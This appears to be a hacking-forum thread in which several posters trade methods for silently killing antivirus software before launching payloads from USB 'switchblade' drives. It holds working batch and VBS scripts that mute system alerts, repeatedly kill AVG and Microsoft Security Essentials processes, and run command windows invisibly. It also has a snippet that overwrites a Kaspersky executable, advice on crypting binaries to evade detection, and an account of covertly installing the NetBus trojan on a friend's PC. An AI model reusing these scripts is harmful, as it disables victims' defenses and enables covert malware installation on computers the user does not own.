Jump to content

Alternative Method to Kill AV's.


Abigwar
 Share

Recommended Posts

Any good AV app, like ESET, and the others that have been mentioned will auto restart, or produce alerts if they try to be killed.

Notice how ekrn.exe and egui.exe are not in the metasploit list? Thats because when killed, they immediately restart. Well, ekrn does anyway, egui is just the frontend, even if you do lose that , the warnings still appear.

But still, a better solution than simply process killing would be great :)

Link to comment
Share on other sites

** Random Thought **

What about a method that involves forcing the process to shutdown but when it restarts it is forced to restart in a sandboxed environment rendering it useless to the system. As for the pop-up messages what about a monitor refresh triggered by the pop-up. This would blank the screen for a moment giving the pop-up time to fade. Although the screen blanking out would be an indicator many users would just think it was a minor glitch.

*Extremely Crude* Alternatively use an auto-it script to hide the cursor, take a screen shot, hide the taskbar and replace the background with the screenshot and to be switched back to original settings after payload runs.

I'll begin the research to see if this is possible but wanted to get some thoughts on this.

Link to comment
Share on other sites

  • 3 months later...

he did you guys thought of cleaning the whole .exe program with vba,vb or vbs. you can let your program check if the paths exists and than open the .exe and let it type something like "lol you just got hacked". then on next startup delete registery values and make a virus downloader. code looks like this.

MyFile = "C:\Program files\kaspersky 2009" & "kaspersky.exe"

fnum = FreeFile()

Open MyFile For Output As fnum

Print #fnum, "this doesn't work anymore"

Close #fnum

and before this code you could run a check code to check of the path exists.

no i am going back to gaming bye bye :ph34r:

Link to comment
Share on other sites

i was thinking, if the file was editedd in the correct proceedure there would be minimal work to undetect these bf compiling

ie, resulting exe will either need crypting or hexing, if 1 person kept uptodate undetected files on server then that might prove useful, if the file was crypted then all firewalls n AV will not flag them if a half decent crypter was used it could just rum in the ram memmory HMMM what you think

Link to comment
Share on other sites

  • 1 month later...
  • 1 month later...
he did you guys thought of cleaning the whole .exe program with vba,vb or vbs. you can let your program check if the paths exists and than open the .exe and let it type something like "lol you just got hacked". then on next startup delete registery values and make a virus downloader. code looks like this.

MyFile = "C:\Program files\kaspersky 2009" & "kaspersky.exe"

fnum = FreeFile()

Open MyFile For Output As fnum

Print #fnum, "this doesn't work anymore"

Close #fnum

and before this code you could run a check code to check of the path exists.

no i am going back to gaming bye bye :ph34r:

Lol hows that gonna work when kaspersky.exe is already running?

By the way guys maybe look into ZwTerminateProcess? It should be able to close any process whenever you want :)

Link to comment
Share on other sites

  • 2 weeks later...
  • 2 weeks later...

hi to all,

im new to this community as you can probably guess from the amount of posts i have made.. :)

and english is not my strongest side, so you''ll have to excuse my grammar and spelling...

i had a problem similar to what you guys describe, and my solution was some kind of social engineering,

i was trying to load old trojan (netbus.. dont ask, im not that lame, it was a bet..) on a friends pc. but the bu%#$d had kaspersky running, and i couldn't find any way to turn it off, so i did the exact opposite, i made a batch file that made the security so tight my friend couldn't work. in the same batch file i have added several if statements that checked if kaspersky is running: and when it find out it wasn't; a second file i've inserted to his boot downloaded and executed Netbus and notified me...

what happend was that, like i hoped, my friend got frustrated with kaspersky so he uninstalled it,

the dos commands for doing this trick actually came from the kaspersky forums, and of course i knew in advance that he uses kaspersky..

anyway, just another idea..

Link to comment
Share on other sites

I thought that u could somehow patch the AV like any other program, make the patch start before the AV (probably get it RING 0 privileges), so ASM would be the right choice. But there is a problem i know with NOD32, if any program tries to change it detects the change and asks if u want to allow it. I don't know about other AV's, and nether do i know if it would check its own code if u change it before the start, but it might work.

Link to comment
Share on other sites

  • 2 months later...
Ok guys, We all know that the AVKill (csrss.exe) we use for our switchblades is outdated and flagged by every AV known. So I wanted to come up with an alternative method of killing AV's before launching our switchblades. If this works out, I think it would be a great addition to Leapos Pocket Knife.

What I decided to try, was using Nircmd's processkill command to elminate the AV processes. I was concerned that the AV would recognize the attempt and block it, or alert. For AV's such as Avast, we would want to make sure we mute the system speakers. (Note, We would want to do that anyway, because if Avast flags a virus it screams "A VIRUS HAS BEEN DETECTED"). Anyway, if a certain AV alerts to the attempt to kill it's process, what is the difference, because it is going to alert to running csrss.exe and some of our other tools. So long as it isn't audible, we still have time to get in and out with out immediete detection.

I tested this on AVG and it worked flawless and silently.

::Abigwar's First Attempt at Batch AVkiller

::Mute the system volume, in case of audible AV Alerts (Avast!)
nircmd mutesysvolume 1

::Kill AVG Command Center
nircmd killprocess avgcc.exe

::Kill other AVG Processes
nircmd killprocess avgemc.exe
nircmd killprocess avgupsvc.exe
nircmd killprocess avgamsvr.exe

::Restore system volume at end of switchblade
nircmd mutesysvolume 0

Now what I would like to ask from all of you, is to look at your system processes and lets make a list of the processes each virus scanner uses. When we have them all listed, we can then script it into the batch to kill all the applicitable processes. We also need to see how each AV reacts to the attempt to kill it's processes.

One other thing I was considering, that if an AV's process is persistant, we could loop the batch file to continue to run, and kill the process over and over. How that could work, is we would call the seperate Anti-AV batch file from the start.bat or go.bat, and let it loop until the switchblade ends. So at the end of the switch blade we would create a text file on the thumbdrive. The loop would stop when it sees the file, then delete it to make it ready for next time and end.

::Theoretical Loop batch

:Start
nircmd killprocess avgcc.exe
nircmd killprocess avgemc.exe
nircmd killprocess avgupsvc.exe
nircmd killprocess avgamsvr.exe

IF EXIST SWITCHDONE.TXT GOTO END
GOTO START
:END
delete switchdone.txt

A pretty detailed list of AV processes can be found here:

http://dev.metasploit.com/redmine/projects...reter/killav.rb

Link to comment
Share on other sites

  • 8 months later...

it took me hours but ive finally got Microsoft security essentials to disable itself

now the only issue i have is on windows 7 ultimate 64bit when anti virus shuts off is the action centre display a message saying turn on Microsoft security essentials

i take it i need some code before this to disable action center from displaying messages

should i look at a reg setting or group policy setting

i tried net stop wscsvc (security center service ) but it displays its turned it self off

Please help

i got 2 bat files and a vbs file (as this the only way i could find to run cmd prompt invisible is there a better way to dothis )

here is the code i got so far

launch.bat

wscript.exe "invis.vbs" "MS Security Essentials off.bat"

invis.vbs

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

MS Security Essentials off.bat

Echo off
net stop MsMpSvc
process.exe -k MsMpEng.exe
process.exe -k msseces.exe

The process.exe is an app called Command Line Process Viewer/Killer/Suspender

it is the only way i found sucsessfull to kill MSE .exe's

you can download it HERE

and heres how to use the switches Link

any suggestions to tidy up my code would be great

rod

Link to comment
Share on other sites

  • 3 months later...

If it helps, here are some scripts I found a while ago to easily escalate windows privileges(at least in XP, as far as I have tested). I used it to allow my (under) privileged account at school to run a batch file that installed Portal on one of the autoCAD boxes in school :D

It consists of 3 scripts to elevate the current process to one ran as Admin or even PowerUser(Windows equivalent of root). I don't know if it'll be of any use, but here it is anyways.

http://www.filedude.com/download/RVSJ3rYkIR3c55e742fe

Side Note: Why can't we upload zip files via the the forum attachments?

Link to comment
Share on other sites

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...